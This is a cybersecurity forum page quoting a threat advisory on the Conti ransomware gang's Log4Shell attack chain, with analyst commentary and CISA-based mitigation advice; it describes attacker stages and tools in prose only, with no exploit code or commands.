Log in
Register
Cyber Forum
More options
Toggle width
Share this page
Share this page
Share
Share
Cyber Forum
Log in
Register
More options
Toggle width
Share this page
Share this page
Share
Share
Menu
Install the app
Install
Home
CyberWeekly Podcast
Breaking News! Podcast
Cyber Risk Rating
Forums
New posts
Forum list
Trending
Leaderboards
News Feeds
Resources
Latest reviews
Sophos X-Ops Intelix
Threat Reports
Members
Current visitors
My.CompTIA
Help Documents
Preference Center
Forums
Security
Active Exploits Discussion/Recommendations
Log4j Vulnerability Information
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Message
<blockquote data-quote="MJ Shoer" data-source="post: 2555" data-attributes="member: 3"><p><h3><span style="color: rgb(184, 49, 47)">Severity: High</span> <span style="color: rgb(0, 168, 133)">TLP: Green</span> Threat Actors Continue to Leverage Log4J</h3><p><strong>Tags</strong></p><ol> <li data-xf-list-type="ol"><strong>Critical CVE</strong></li> <li data-xf-list-type="ol"><strong>Cybercriminal Attack</strong></li> <li data-xf-list-type="ol"><strong>Nation State Attack</strong></li> <li data-xf-list-type="ol"><strong>Phishing Campaign</strong></li> <li data-xf-list-type="ol"><strong>Ransomware Attack</strong></li> </ol><p><strong>Conti Ransomware Gang Has Full Log4Shell Attack Chain</strong></p><p><strong></strong></p><p><strong>Summary:</strong></p><p>"The Conti ransomware gang, which became the first professional crimeware outfit to adopt and weaponize the Log4J Shell vulnerability last week, has built up a holistic attack chain.</p><p></p><p>The sophisticated Russia-based Conti group – which Palo Alto Networks has called "one of the most ruthless" of dozens of ransomware groups currently known to be active – was in the right place at the right time with the right tools when Log4 Shell hit the scene 10 days ago, security firm Advanced Intelligence (AdvIntel) said in a report shared with Threatpost on Thursday.</p><p></p><p>As of today, Monday, Dec. 20, the attack chain has taken the following form, AdvIntel’s Yelisey Boguslavskiy told Threatpost: Emotet -> Cobalt Strike -> Human Exploitation -> (no ADMIN$ share) -> Kerberoast -> brute -> vCenter ESXi with log4j shell scan for vCenter, (<a href="https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/" target="_blank">ThreatPost, 2021</a>).”</p><p></p><p><strong>Analyst Comments:</strong></p><p>The threat actors that fall under Contis umbrella appear to be using various methods and tools to pivot to and from internal resources. They're using commodity tools and malware that have reportedly been used in attacks against multiple organizations and industries over the past few months.</p><p></p><p>Emotet was delivered via obfuscated fake installation packages, such as Adobe Reader, and disguised as legitimate .XLS files containing malicious macros. Actors are still using cobalt strike to access target systems and then leveraging LogJ4 vulnerabilities on devices attached to local network segments, "As of Wednesday, Dec. 15, Conti was looking for vulnerable VMWare networks for initial access and lateral movement. The VMware servers are on a dismayingly long list of affected components and vendors whose products have been found to be vulnerable to Log4Shell, (<a href="https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/" target="_blank">ThreatPost, 2021</a>)."</p><p></p><p>The motivation for obtaining initial access is high; threat actors know that there is likely an internal asset somewhere that may be running a vulnerable version of Log4j that could be leveraged to bypass any access control placed on mission-critical systems. If they can compromise or encrypt systems that contain crown jewels, which are often hypervisors, a payout is likely due to their efforts.</p><p></p><p><strong>Mitigation:</strong></p><p>On CISA's call yesterday, emphasis was placed on how companies should mitigate systems utilizing vulnerable instances of Log4j. It was recommended that organizations scan and mitigate assets directly exposed to the internet first and foremost and then move inward to ones located on internal network segments. If a vulnerable server was exposed to the internet at any point time, assume compromise.</p><p></p><p><strong>Source:</strong></p><p><a href="https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/" target="_blank"><strong>https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/</strong></a></p></blockquote><p></p>
[QUOTE="MJ Shoer, post: 2555, member: 3"] [HEADING=2][COLOR=rgb(184, 49, 47)]Severity: High[/COLOR] [COLOR=rgb(0, 168, 133)]TLP: Green[/COLOR] Threat Actors Continue to Leverage Log4J[/HEADING] [B]Tags[/B] [LIST=1] [*][B]Critical CVE[/B] [*][B]Cybercriminal Attack[/B] [*][B]Nation State Attack[/B] [*][B]Phishing Campaign[/B] [*][B]Ransomware Attack[/B] [/LIST] [B]Conti Ransomware Gang Has Full Log4Shell Attack Chain Summary:[/B] "The Conti ransomware gang, which became the first professional crimeware outfit to adopt and weaponize the Log4J Shell vulnerability last week, has built up a holistic attack chain. The sophisticated Russia-based Conti group – which Palo Alto Networks has called "one of the most ruthless" of dozens of ransomware groups currently known to be active – was in the right place at the right time with the right tools when Log4 Shell hit the scene 10 days ago, security firm Advanced Intelligence (AdvIntel) said in a report shared with Threatpost on Thursday. As of today, Monday, Dec. 20, the attack chain has taken the following form, AdvIntel’s Yelisey Boguslavskiy told Threatpost: Emotet -> Cobalt Strike -> Human Exploitation -> (no ADMIN$ share) -> Kerberoast -> brute -> vCenter ESXi with log4j shell scan for vCenter, ([URL='https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/']ThreatPost, 2021[/URL]).” [B]Analyst Comments:[/B] The threat actors that fall under Contis umbrella appear to be using various methods and tools to pivot to and from internal resources. They're using commodity tools and malware that have reportedly been used in attacks against multiple organizations and industries over the past few months. Emotet was delivered via obfuscated fake installation packages, such as Adobe Reader, and disguised as legitimate .XLS files containing malicious macros. Actors are still using cobalt strike to access target systems and then leveraging LogJ4 vulnerabilities on devices attached to local network segments, "As of Wednesday, Dec. 15, Conti was looking for vulnerable VMWare networks for initial access and lateral movement. The VMware servers are on a dismayingly long list of affected components and vendors whose products have been found to be vulnerable to Log4Shell, ([URL='https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/']ThreatPost, 2021[/URL])." The motivation for obtaining initial access is high; threat actors know that there is likely an internal asset somewhere that may be running a vulnerable version of Log4j that could be leveraged to bypass any access control placed on mission-critical systems. If they can compromise or encrypt systems that contain crown jewels, which are often hypervisors, a payout is likely due to their efforts. [B]Mitigation:[/B] On CISA's call yesterday, emphasis was placed on how companies should mitigate systems utilizing vulnerable instances of Log4j. It was recommended that organizations scan and mitigate assets directly exposed to the internet first and foremost and then move inward to ones located on internal network segments. If a vulnerable server was exposed to the internet at any point time, assume compromise. [B]Source:[/B] [URL='https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/'][B]https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/[/B][/URL] [/QUOTE]
Name
Verification
Post reply
Forums
Security
Active Exploits Discussion/Recommendations
Log4j Vulnerability Information
Top
Bottom
Home
Forums
Threat Reports
My.CompTIA
Menu